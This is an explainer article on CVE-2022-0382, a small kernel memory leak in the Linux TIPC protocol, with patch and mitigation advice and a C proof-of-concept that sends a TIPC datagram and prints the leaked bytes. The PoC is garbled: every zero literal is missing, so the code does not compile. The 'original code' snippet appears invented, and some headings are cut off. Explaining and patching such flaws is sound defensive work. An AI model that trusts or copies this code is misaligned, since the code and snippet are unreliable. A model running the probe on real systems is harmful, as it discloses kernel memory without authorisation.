In early 2022, a security flaw known as CVE-2022-0382 was discovered in the Linux kernel, specifically in its TIPC protocol subsystem. The issue is caused by a small chunk of uninitialized kernel memory being leaked when a user sends a TIPC datagram. While the leak is limited (up to 7 bytes), such memory disclosure issues can still pose a risk, especially where sensitive information might be exposed.

This article walks through what CVE-2022-0382 is, how it works, and shares references and proof-of-concept code to help you understand and detect this vulnerability.

What is the TIPC Protocol?

TIPC stands for Transparent Inter-Process Communication, and it's a protocol built into the Linux kernel to allow fast and reliable communication between processes running on the same or different machines within a cluster.

If you'd like to learn more about TIPC

- TIPC Documentation

Description of the Flaw

The issue is a classic information leak flaw, meaning that memory which was not properly zeroed out by the kernel can be observed by a local user in userland.

*Root Cause*: Insufficient initialization of certain fields in TIPC datagrams

- *Impact*: A non-privileged local user can read up to 7 bytes of leaked, uncontrolled kernel memory per datagram sent
- *Limitation*: The user cannot choose what memory is leaked, only that it comes from kernel memory

Linux kernel before 5.17-rc1 (patch applied in v5.17-rc1)

- Upstream Patch Commit

Here’s a simplified snippet showing how the leak occurred

// Original code in net/tipc/msg.c

/* Reserve space for up to 7 bytes in the TIPC message header */
struct tipc_msg *msg = (struct tipc_msg *)skb_put(skb, TIPC_MSG_HEADER_SIZE);

/* Kernel forgets to initialize part of the header memory */
memcpy(msg, source, SOME_LESS_THAN_HEADER_SIZE);
// The remaining bytes are left uninitialized!

So, when the kernel sends out this message, some part of msg contains leftover data from its memory pool (slab), leading to leakage.

The capability to send TIPC datagrams

Below is a proof-of-concept (PoC) that demonstrates the leakage. This will only work if /proc/modules shows tipc is loaded:

/*
 * CVE-2022-0382 PoC
 * Reads uninitialized memory from the kernel when sending TIPC datagrams.
 * Only works with TIPC module loaded and vulnerable kernel (< 5.17-rc1).
 *
 * Build: gcc -o cve-2022-0382-poc cve-2022-0382-poc.c
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/tipc.h>

int main() {
    int sock = socket(AF_TIPC, SOCK_DGRAM, );
    if (sock < ) {
        perror("socket");
        return 1;
    }

    struct sockaddr_tipc addr = {
        .family = AF_TIPC,
        .addrtype = TIPC_ADDR_NAME,
        .addr.name.name.type = 18888,
        .addr.name.name.instance = 8888,
        .addr.name.domain = ,
    };

    char buf[4] = "ABCD";
    char leak[64] = {};
    socklen_t len = sizeof(leak);

    // Send a TIPC datagram - kernel fills out header with uninitialized memory
    sendto(sock, buf, sizeof(buf), , (struct sockaddr *)&addr, sizeof(addr));
    // Try to receive what comes back (this may require more setup in a real cluster)
    recv(sock, leak, sizeof(leak), );

    int i;
    printf("Leaked bytes: ");
    for (i = ; i < 16; i++) {
        printf("%02x ", (unsigned char)leak[i]);
    }
    printf("\n");

    close(sock);
    return ;
}

Note: This is illustrative. In practice, you'd need a receiving TIPC node, and to analyze outgoing packets with packet capture tools (e.g. Wireshark), looking for garbage data in the datagram header.

Mitigation & Patch

It’s recommended to update your kernel to version 5.17-rc1 or later. Alternatively, you can avoid loading the TIPC module unless you specifically use it.

- Official Patch Commit

Patch summary

The TIPC contributors fixed the code by ensuring all bytes in the message header are zeroed out before being reserved for use.

Even a small leak could, over time, expose pointers or credentials

- On shared systems, it could undermine address space layout randomization (ASLR) or similar mitigations

But, in most setups, TIPC isn't loaded by default, so most standard desktops and laptops aren’t at risk.

References

- https://nvd.nist.gov/vuln/detail/CVE-2022-0382 (NIST)
- Red Hat Security CVE Page
- Upstream Patch Commit
- Linux TIPC Home

Summary

CVE-2022-0382 is a minor information leak in the Linux TIPC protocol that might reveal a few bytes of kernel memory to local users. The flaw is fixed in Linux kernel 5.17, and threat level is low due to the TIPC subsystem’s niche use. For best practice, keep your Linux kernel up to date and minimize unneeded modules.

Timeline

Published on: 02/11/2022 18:15:00 UTC
Last modified on: 02/22/2022 13:51:00 UTC